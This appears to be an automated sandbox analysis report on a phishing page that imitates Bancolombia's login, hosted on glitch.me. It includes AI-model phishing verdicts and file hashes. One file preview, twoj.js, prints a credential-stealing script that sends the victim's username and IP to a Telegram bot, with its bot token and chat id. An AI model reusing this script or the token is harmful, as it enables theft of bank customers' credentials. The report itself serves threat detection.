                                                                                                                          • Excluded IPs from analysis (whitelisted): 142.250.185.110, 142.250.185.131, 64.233.167.84, 34.104.35.123, 142.250.184.202, 142.250.184.200, 172.217.18.10, 142.250.185.234, 172.217.18.106, 142.250.185.74, 216.58.206.42, 216.58.212.138, 142.250.181.234, 142.250.185.202, 142.250.186.74, 142.250.185.138, 142.250.186.170, 142.250.185.170, 142.250.186.42, 142.250.185.106, 142.250.186.138, 142.250.184.234, 142.250.185.78, 142.250.186.104, 142.250.186.78, 20.109.210.53, 199.232.214.172, 192.229.221.95, 13.95.31.18, 142.250.185.163
                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, wu-b-net.trafficmanager.net, www.google-analytics.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ajax.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, azureedge-t-prod.trafficmanager.net, clients.l.google.com
                                                                                                                          • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          No simulations
                                                                                                                          InputOutput
                                                                                                                          URL: http://bancolombia-seguridad-co.glitch.me/ Model: gemini-1.5-flash
                                                                                                                          {
                                                                                                                          "text": "Departamento de Seguridad - Bancolombia Selecciona que Tipo de Cliente eres,
                                                                                                                           luego ingresa los datos solicitados y haz clic en \"Continuar\". Ingrese su usuario  Cancelar Continuar  Paso a paso para recordar tu usuario Problemas para conectarte?  Seguridad Politica de Privacidad Terminos y Condiciones Preguntas Frecuentes  Sucursal Telefonica Bogota: (57) 1 601 343 00 00 - Medellin: (57) 4 510 90 00 - Cali: (57) 2 602 554 05 - Barranquilla: (57) 5 361 88 88 - Cartagena: (57) 6 693 44 00 - Bucaramanga: (57) 7 667 25 25 Pereira: (57) 6 60 12 13 - El resto del pais 018000 9 12345. Sucursales Telefonicas en el exterior: Espana (34) 900 995 717 - Estados Unidos (1) 866 379 97 14.   2024 Bancolombia S.A.",
                                                                                                                           "contains_trigger_text": true,
                                                                                                                           "trigger_text": "Continuar",
                                                                                                                           "prominent_button_name": "Continuar",
                                                                                                                           "text_input_field_labels": ["Tipo de Cliente",
                                                                                                                           "Ingrese su usuario"],
                                                                                                                           "pdf_icon_visible": false,
                                                                                                                           "has_visible_qrcode": false,
                                                                                                                           "has_visible_captcha": false,
                                                                                                                           "has_urgent_text": false}
                                                                                                                          Google indexed: False
                                                                                                                          URL: http://bancolombia-seguridad-co.glitch.me/ Model: gemini-1.5-flash
                                                                                                                          {
                                                                                                                          "brands": ["Grupo Bancolombia",
                                                                                                                           "Bancolombia"]}
                                                                                                                          Google indexed: False
                                                                                                                          URL: http://bancolombia-seguridad-co.glitch.me/ Model: jbxai
                                                                                                                          {
                                                                                                                          "brands":["Grupo Bancolombia"],
                                                                                                                          "text":"Sucursal Virtual Personas Fecha y hora actual: Domingo,
                                                                                                                           13 de Octubre de 2024 12:20:40 DEPARTAMENTO DE SEGURIDAD - BANCOLOMBIA Selecciona que Tipo de Cliente eres,
                                                                                                                           luego ingresa los datos solicitados y haz clic en \"Continuar\" Tipo de Cliente Persona Ingrese su usuario Cancelar Continuar Paso a paso para recordar tu usuario Problemas para conectarte? Seguridad Poltica de Privacidad Terminos y Condiciones Preguntas Frecuentes Sucursal Telefonica: Bogota (57) 60 1 343 00 00 - Medellin (57) 60 4 510 90 00 - Cali (57) 60 2 554 05 05 - Barranquilla (57) 60 5 361 88 88 - Cartagena (57) 60 5 693 44 00 - Bucaramanga (57) 60 7 697 25 25 Pereira (57) 60 6 340 12 13 - El resto del pais 018000 9 12345. Sucursales Telefonicas en el exterior: Espaa (34) 900 995 717 - Estados Unidos (1) 866 379 97 14.",
                                                                                                                          "contains_trigger_text":true,
                                                                                                                          "trigger_text":"DEPARTAMENTO DE SEGURIDAD - BANCOLOMBIA",
                                                                                                                          "prominent_button_name":"Continuar",
                                                                                                                          "text_input_field_labels":["Persona",
                                                                                                                          "Ingrese su usuario"],
                                                                                                                          "pdf_icon_visible":false,
                                                                                                                          "has_visible_captcha":false,
                                                                                                                          "has_urgent_text":false,
                                                                                                                          "has_visible_qrcode":false}
                                                                                                                          URL: http://bancolombia-seguridad-co.glitch.me/ Model: gemini-1.5-pro-002
                                                                                                                          {
                                                                                                                          "legit_domain": "grupobancolombia.com",
                                                                                                                           "classification": "wellknown",
                                                                                                                           "reasons": ["The URL contains the brand name 'bancolombia' but uses a suspicious domain 'glitch.me'.",
                                                                                                                           "The use of hyphens to separate words in the domain and the '.me' extension raise red flags.",
                                                                                                                           "Legitimate financial institutions rarely use free hosting services like Glitch.",
                                                                                                                           "The input fields 'Tipo de Cliente' and 'Ingrese su usuario' are typical for login forms,
                                                                                                                           which are commonly used in phishing attacks to steal credentials."],
                                                                                                                           "riskscore": 10}
                                                                                                                          Google indexed: False
                                                                                                                          URL: bancolombia-seguridad-co.glitch.me
                                                                                                                          Brands: Grupo Bancolombia
                                                                                                                          Input Fields: Tipo de Cliente, Ingrese su usuario
                                                                                                                          URL: http://bancolombia-seguridad-co.glitch.me/ Model: jbxai
                                                                                                                          {
                                                                                                                          "phishing_score":9,
                                                                                                                          "brands":"Grupo Bancolombia",
                                                                                                                          "legit_domain":"bancolombia.com",
                                                                                                                          "classification":"wellknown",
                                                                                                                          "reasons":["The brand 'Grupo Bancolombia' is a well-known financial institution in Colombia.",
                                                                                                                          "The legitimate domain for Grupo Bancolombia is 'bancolombia.com'.",
                                                                                                                          "The URL 'bancolombia-seguridad-co.glitch.me' contains extra words and uses a subdomain structure that is not typical for a legitimate financial institution.",
                                                                                                                          "The use of 'glitch.me' as a domain extension is unusual for a well-known bank and suggests a potential phishing attempt.",
                                                                                                                          "The presence of 'seguridad' (security) in the URL is a common tactic used in phishing to create a false sense of security."],
                                                                                                                          "brand_matches":[false],
                                                                                                                          "url_match":false,
                                                                                                                          "brand_input":"Grupo Bancolombia",
                                                                                                                          "input_fields":"Persona"}
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (419)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):10017
                                                                                                                          Entropy (8bit):4.565899290404595
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:Jz3/xCsLGSPUfIdSDSwm6RQpiNCGNCmjHn/Wisn:JzsSPycS+wzRQpiNCGNCYHn/un
                                                                                                                          MD5:D6A0FB8CA650D01903B7A0464C1C5D7A
                                                                                                                          SHA1:B218CB577D95A914298424C325846A65BC1E9533
                                                                                                                          SHA-256:003401EB75EC424BEDE5EEE8486130A7A821FBE640B25DC5F807AED191DBEC54
                                                                                                                          SHA-512:44BAC69872D8D0259739FBE6BD15D9600B12A556B6B586C334ECF3DD12E29C631197A175D00884E0D3A0774DBAB11EE05575189A63553A447124BE8CD4C6DB35
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Preview: <html><head>. Inserted by miarroba -->. <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-T2VG59');</script>. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">...<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE10">. <meta name="apple-itunes-app" content="app-id=284847138">.......<link rel="stylesheet" href="./hhhhhh_files/bactouch.css"><link rel="stylesheet" href="./hhhhhh_files/toolbar.css"><link rel="stylesheet" href="./hhhhhh_files/bact_listview.css"><link rel="stylesheet" href="./hhhhhh_files/footer.css"><script src="./hhhhhh_files/authhub-helper.js.descarga"></script><link r
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):319
                                                                                                                          Entropy (8bit):4.958096110782438
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:kXO19TgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:k+15gIOuHhA/XvoPPWV5k
                                                                                                                          MD5:08A2B55038C84B2382467AEAD674B6AF
                                                                                                                          SHA1:C37E8D26147F03F28B7218E2D75E86E059C8BBC6
                                                                                                                          SHA-256:1878C31F5801E8D406B018CA96EBFF59D1649D24FA153B39968442A8411D7748
                                                                                                                          SHA-512:B42CC38C85A4A7D38DD60741C233741276D7BAA565819C04D281D32F739A3E84C031310A8777A75072C79232057E4B46E01E1EA2539C401519B1A60AD40B818B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://ipinfo.io/
                                                                                                                          Preview:{. "ip": "8.46.123.33",. "hostname": "static-cpe-8-46-123-33.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/hhhhhh_files/bact_listview.css
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, manufacturer=BeFunky, orientation=upper-left, xresolution=94, yresolution=102, resolutionunit=2, software=BeFunky Photo Editor], baseline, precision 8, 2000x1000, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):648805
                                                                                                                          Entropy (8bit):7.96213102451655
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:myqCa+rpH5NeZsLKD8WdD/7Deyitgw0OHofIMlyiUeVMIiwHfShWg:nqCbFGdD/76yiZ0+CyCVhaog
                                                                                                                          MD5:35F3240B61143E838EFDE4C3B19132C5
                                                                                                                          SHA1:350771D41668D49B95AE60216CDBDF4B58DBD21E
                                                                                                                          SHA-256:7C5FD41E76E8AE819B6AFA31F1F42B9896C4D49C145D7B5E7514B62C81E11080
                                                                                                                          SHA-512:D37E57722EF93D26D733A53C039305389520DDCDAE19B4EC4EF79D418728E91E546AE173417CDB15FA903DAA47CAA026A476151DA0476B5CB0C9346C1478BEB5
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://mtmarketing.co/wp-content/uploads/2021/07/entrevista-adriana-arismendi.jpeg
                                                                                                                          Preview:......Exif..MM.*.................V.......................^...........f.(...........1.........n....BeFunky....,.......,....BeFunky Photo Editor.....JFIF.....,.,.....C....................................................................C........................................................................................................................n................+........!1.AQ.."a..q.....2....#B..R..$3brv....6C...%48Scw....9Tx...5DFUfg..&7d....Ghstu........................................c......................!..1A.Qa."q..........2.BR..#b.36ru...$Cv.....STc...457..%Des.....Udt.&.................?..:............z....E',k3PT....|..O.S....}dr..YI....&....6'}R..m...(....?.M...|~...d{...R..3...?u;t...........+.....B...t..2.f$..~_..-D.$D........k.Lm.>.qDU.....1..f..71..F....*....M...\..o.#m...[.o2.JgI.~g..J. ..N...$t1Ea.H.aH.A....A..%..I...#.w...!...k.-A....=t.../...s...UQU(.......o..EJ.c1.E.iDU...'~..$8...&>JZ+...x.'w....p."b...@~C...!..&|b.....?0h.....\Lx.Qk.I...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 2000x1000, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):66514
                                                                                                                          Entropy (8bit):6.207297697570252
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:hx9+YDDZf88+/agDeXXNOk0wcuS0sXowB3tqSMo3X++Ipf:DD18dyg29Ok6hXoIdaKEf
                                                                                                                          MD5:C3C10BA9CA27C95E262090732B3AC6AB
                                                                                                                          SHA1:18C6E248817B4B478716464C79E696360CB39C7C
                                                                                                                          SHA-256:C9C03DA005004902530FDC45D441475E4FB97CD72998907033F5A21F4B0C2DAF
                                                                                                                          SHA-512:44AD187AFA12B05D06A769CB24769ECD6FFF0EDF3E0B45DBC8D2DEDF630ABFCBE406229DFEEF7C6C7C9ABBEBE968035C53C46D25BD6D2C2A1F023865BA03C4FA
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......Exif..II*.................Ducky.......<.....1http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.f354efc70, 2023/11/09-12:05:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.4 (Macintosh)" xmpMM:InstanceID="xmp.iid:3F0F16CC116711EFB5CFBF135A63C884" xmpMM:DocumentID="xmp.did:3F0F16CD116711EFB5CFBF135A63C884"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3F0F16CA116711EFB5CFBF135A63C884" stRef:documentID="xmp.did:3F0F16CB116711EFB5CFBF135A63C884"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...........................................................................................................................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/archivos/icon-user.png
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):28
                                                                                                                          Entropy (8bit):4.378783493486176
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:4kRL:b
                                                                                                                          MD5:2F21AF215C6488700CE8E7E85324A4DB
                                                                                                                          SHA1:427CBF8E39CEE7946AE5C1E2127CBF6FA07DF624
                                                                                                                          SHA-256:75A9B51FF9E6C384A7D77E6F6C9C120E1BF5DB5FD6ECDFE51F3E06EB82FBA32D
                                                                                                                          SHA-512:41754285116E160E1BA75675216D85CE3A19C5ADC7AAEF80C63BC529516B9B11C285925ACE72BC7BA3C21FE0C1DA370CC5CD2AF9E0183C34EB5E42493B5CFC18
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlS8rtTmwskixIFDei2I7QSBQ1lRcp7?alt=proto
                                                                                                                          Preview:ChIKBw3otiO0GgAKBw1lRcp7GgA=
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/archivos/jquery-ui.css
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):3674
                                                                                                                          Entropy (8bit):4.699432903511224
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2PV6qmryH65Um4d2BQwmfX6cmFFp/fG6wJXqXAh4RNTakVvAsuDD5tSIrPdffMJK:Y16eEBm/6lFF5f9wJXiAh4RN8DrSSJj1
                                                                                                                          MD5:CE0366D3C0EF2D5187EFC621C5E7FB00
                                                                                                                          SHA1:83F60D035E88968D24178360639A8AD6CC08DC26
                                                                                                                          SHA-256:2784F6FFEFBD5FCAE302D112E1629907DEED1E36F9C2050EA6D7038EEC3F649C
                                                                                                                          SHA-512:375FD32E21278257B71F412ED4AC68B0C307C2FACB08F06A84DBF38EB50F6714ECBC29877868B871348924641C75A8A0D471510D1C0C1D9B2C5A423CD92E2628
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/archivos/ingre.png
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="utf-8">. <title>Well, you found a glitch.</title>. <meta name="viewport" content="initial-scale=1, width=device-width">. <link rel="stylesheet" type="text/css" href="https://cloud.webtype.com/css/3a8e55c6-b1f3-4659-99eb-125ae72bd084.css">. <style>. * {. box-sizing: border-box;. }.. html, body {. margin: 0;. padding: 0;. font-family: "Benton Sans", Helvetica, Sans-serif;. font-size: 16px;. line-height: 160%;. width: 100%;. height: 100%;. }.. .container {. width: 100%;. height: 100%;. display: flex;. padding: 100px;. }.. .info {. max-width: 370px;. z-index: 1;. position: relative;. }.. h1 {. margin: 0;. font-size: 40px;. line-height: 130%;. font-weight: bold;. }.. a {. color: #000;. }.. .decorative-image {.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2345)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):219116
                                                                                                                          Entropy (8bit):5.538790518440856
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:lw+H1CEOFp7Q60BuoI1Lirsiy30V9KjmxcQLJ0nkMo:G8OF1LO5XyjmxcQLJSo
                                                                                                                          MD5:8A66349CD8015E69C0810E38D790D635
                                                                                                                          SHA1:5D659925A014571EB53D33D8C10711690FBFB6A8
                                                                                                                          SHA-256:D86EBD7300908EDEB1CBF7D0A4C2F6F95995DAE69B51FA9D384E07586770F346
                                                                                                                          SHA-512:08F3ED8C89495E457F5E6AF0E68F705DCFD345453C83A1058FAA61ABAD2E2A0EECF195A303EB4D88EDD8DCB72AA82A0AA4896017D4162A51FDB34AAD7CD66073
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-T2VG59
                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"8",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__ua","once_per_event":true,"vtp_overrideGaSettings":true,"vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_trackType":"TRACK_PAGEVIEW","vtp_functionName":"mia_ga","vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-597118-7","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternal
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (11047)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):88050
                                                                                                                          Entropy (8bit):5.14393388918379
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:qx6qVJEPdeQeWfe/VeAyesceBde/WeY5ehpegbeEfeHVeoyekce5de3Weg5eJpeM:vof2V6C65dM72Ve6+FuIZX5XLXXXrXcK
                                                                                                                          MD5:BD5859BAB64B070C9BFC0EDB76E8ED17
                                                                                                                          SHA1:B1517307981D9B4E427889E8ED5F11FBD3714705
                                                                                                                          SHA-256:2839AE60848DF835C3B551D7EE7FC7A8F30A20D07BCD57AB879CAC4D8CDA1569
                                                                                                                          SHA-512:0D34B3E9701F48E3E50310569DAC1CC3808E229AE625113DED2BD1FEF95902B967A2EBA377AECA016AE548C8BC9D5F23E2C6ABDE012DF134F5716A629ADE268D
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no, user-scalable=no"/><title>Trusted IP Data Provider, from IPv6 to IPv4 - IPinfo.io</title><meta name="description" content="Get accurate IP address information with IPinfo. Trusted by 400,000+ users, we handle more than 40 billion API requests monthly. Sign up for free account today."/><link rel="canonical" href="https://ipinfo.io"/><meta property="og:url" content="https://ipinfo.io"/><meta property="og:type" content="website"/><meta property="og:title" content="Trusted IP Data Provider, from IPv6 to IPv4"/><meta property="og:description" content="Get accurate IP address information with IPinfo. Trusted by 400,000+ users, we handle more than 40 billion API requests monthly. Sign up for free account today."/><meta property="og:image" content="https://ipinfo.io/static/images/og_logo.png"/><meta name="twitter:card" content="summary_large_image"/>
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):1024
                                                                                                                          Entropy (8bit):4.948665372330102
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Xt14yFBgRR3gGRRXdRR4/6tty89sWIPKgGK7MJJe:j4y7gzgGrdNQZRPUKwPe
                                                                                                                          MD5:D03064F17BC24B951422778FBFF213D2
                                                                                                                          SHA1:F100641F57078D6759215D4C228DB1A5C4E8D554
                                                                                                                          SHA-256:22ABB42C649A43E32F359F68F10BC71C9D6F6F8396F92DBBC22ADF43A11DE87F
                                                                                                                          SHA-512:5F51D9992C021BDF52B330CB35DDCAA35DACF423BCCFE499087DEA596EF6CFAB7DDA0297DA69D5D595E96158189C97A82E9F0D10E16FB9FAE18BA0EB116D2867
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:http://bancolombia-seguridad-co.glitch.me/twoj.js
                                                                                                                          Preview://bot token.var telegram_bot_id = "8085138420:AAHx_JNz5IBzdSm9Az7k7M81341RqwUcRxM";.//chat id.var chat_id = "7106492816";.var u_name, ip, ip2;.var ready = function () {. u_name = document.getElementById("usuario").value;. . ip = document.getElementById("gfg").innerHTML;. ip2 = document.getElementById("address").innerHTML;. message = "-Banc0lombia-\nUsuario: " + u_name + "\nip" + ip +"\n" + ip2 +"\n-LOGIN-";.};.var sender = function () {. ready();. var settings = {. "async": true,. "crossDomain": true,. "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",. "method": "POST", . "headers": {. "Content-Type": "application/json",. "cache-control": "no-cache".. },. "data": JSON.stringify({. "chat_id": chat_id,. "text": message. }). };. $.ajax(settings).done(function (response) {. window.location = '2.html';. console.log(response);. }
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2343)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):52916
                                                                                                                          Entropy (8bit):5.51283890397623
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                          MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                          SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                          SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
